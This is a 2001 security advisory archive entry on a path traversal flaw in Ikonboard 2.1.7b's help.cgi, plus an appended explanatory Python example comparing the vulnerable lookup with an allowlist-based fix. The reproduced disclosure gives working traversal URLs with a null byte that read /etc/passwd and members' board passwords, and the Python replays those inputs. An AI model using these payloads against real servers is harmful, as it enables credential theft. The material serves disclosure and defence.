SecurityTracker.com

SecurityTracker
Archives

Category:   Application (Generic)  >   Ikonboard Vendors:   Ikonboard.com
Ikonboard Bulletin Board Software Allows Remote Viewing of Files and Directories Outside of The Software's Root Directory
SecurityTracker Alert ID:  1001068
SecurityTracker URL:  http://securitytracker.com/id/1001068
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 12 2001
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 2.1.7b
Description:   It is reported that Ikonboard bulletin board software for web sites contains a vulnerability that allows remote users to view files on the server that reside outside of the product's root directory.

The problem reportedly resides in the help.cgi file, which does not filter out the backslash or ".." characters. This allows the attacker to specify any path on the system.

Some demonstration exploit URL formats are provided in the original report.

The vendor has been contacted.

Impact:   A remote user with access to the web server could request and view files and directories outside of Ikonboard's root directory.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ikondiscussion.com/ikonboard/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Re: Ikonboard Bulletin Board Software Allows Remote Viewing of Files and Directories Outside of The Software's Root Directory
A user reports their personal fix for this vulnerability.



Source Message Contents

Subject:  Ikonboard v2.1.7b "show files" vulnerability


-[ Product: Ikonboard
-[ Version: 2.1.7b
-[ OS: Unix, NT
-[ Vendor: Notified, http://www.ikonboard.com

-=[ Summary ]=-

This is another bug in the Ikonboard.
Anyone can read any file on the remote system with
the privileges of the web server.

-=[ Problem ]=-

File: help.cgi

---[L.44]---
$inhelpon = $query -> param('helpon');
---
As we can see, $inhelpon is the input for 'helpon'

---[L.95-97]---
$filetoopen = "$ikondir" . "help/$inhelpon.dat";
$filetoopen = &stripMETA($filetoopen);
open (FILE, "$filetoopen") or die "Cannot locate the required files";
---
Well, it sets the file, runs it through the filter and opens it.
-> $inhelpon, remember?! ;)

Ok, I am not going to post the whole filter it uses because they really
have been able to write a filter that is 24 lines long.
And they finally forgot to filter the backslash, so we can easily just
attach the 'poison null-byte' to '$inhelpon' and we escape the '.dat'.
And of course the script doesn't check for "..", so we can specify
every path we want.

-=[ Exploit ]=-

Example:

http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
- would show the password file, if it is readable with the privileges of
  the web server.

http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../members/<member>.cgi%00
- replace <member> with the member name and it shows you his/her
  board-password.
  (works with Administrator accounts too)

-=[ Patches ]=-

Not yet available.
You could fix the script temporarily by inserting the following line under
line 45 in 'help.cgi':

$inhelpon =~ s/\///g;

This is lame, but it works.

-=[ Greetings ]=-

Neilk - learned a lot from you!
Marc Ruef - I promised it ;)
DukeCS - thanks for everything!
Marko - thanks for your help!
Tribunal - you taught me a lot, thanks
ICB - long time no speak
Svoern - "go get 'em" ;)


So long,

Martin J. Muench <muench@gmc-online.de>
http://mjm.gmc-online.de
http://www.german-secure.de

"Perl - The only language that looks the same before and after RSA
encryption."
- Keith Bostic
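The flaw described above (a help-topic name concatenated into a file path, with no check for ".." and with a NUL byte truncating the ".dat" suffix at open time) and the poster's one-line stop-gap are both easier to reason about next to a hardened version. The following Python is an added example, not code from the original report or from Ikonboard; the directory layout, the allowlist pattern and the function names are assumptions made for illustration. It reproduces the vulnerable path construction only so that the two lookups can be compared on the same inputs, including the ones quoted in the report.

```python
import posixpath
from urllib.parse import unquote
import re

# Constructed stand-in for $ikondir . "help/" in the original script.
HELP_DIR = "/var/www/cgi-bin/ikonboard/help"

# Allowlist for help topics: plain identifiers only. This is the real fix;
# stripping single characters (as the posted "s/\///g" does) leaves every
# other traversal form untouched.
TOPIC_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def vulnerable_help_path(helpon):
    """Mirror of the original help.cgi logic: path built by string
    concatenation, no validation. Perl's open() treats the name as a C
    string and stops at the first NUL, which this stand-in reproduces so
    the effect of the %00 is visible."""
    path = posixpath.join(HELP_DIR, helpon + ".dat")
    nul = path.find("\0")
    if nul != -1:
        path = path[:nul]
    return posixpath.normpath(path)


def safe_help_path(helpon):
    """Hardened lookup. Rejects NUL bytes, enforces the allowlist, then
    confirms the normalised path is still under HELP_DIR (belt and braces:
    the allowlist alone already excludes separators and dots).
    Returns None on any rejection."""
    if not helpon or "\0" in helpon:
        return None
    if not TOPIC_RE.fullmatch(helpon):
        return None
    path = posixpath.normpath(posixpath.join(HELP_DIR, helpon + ".dat"))
    if posixpath.commonpath([HELP_DIR, path]) != HELP_DIR:
        return None
    return path


def decide(raw_helpon):
    """Decode a raw query value the way the CGI layer does (so %00 becomes a
    literal NUL) and report the outcome of both lookups side by side."""
    helpon = unquote(raw_helpon)
    return {
        "vulnerable": vulnerable_help_path(helpon),
        "safe": safe_help_path(helpon),
    }


if __name__ == "__main__":
    # Inputs quoted in the report, plus a benign topic name.
    for raw in ("../../../../../etc/passwd%00", "../members/admin.cgi%00", "posting"):
        print(raw, "->", decide(raw))
```

The vulnerable lookup resolves the first input to /etc/passwd, exactly as the report describes, while the hardened one returns None for both traversal attempts and the expected file for "posting". A server-side check of this shape belongs in help.cgi itself; filtering at the web server (for example, rejecting encoded NULs) is a useful second layer but not a substitute.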








Copyright 2020, SecurityGlobal.net LLC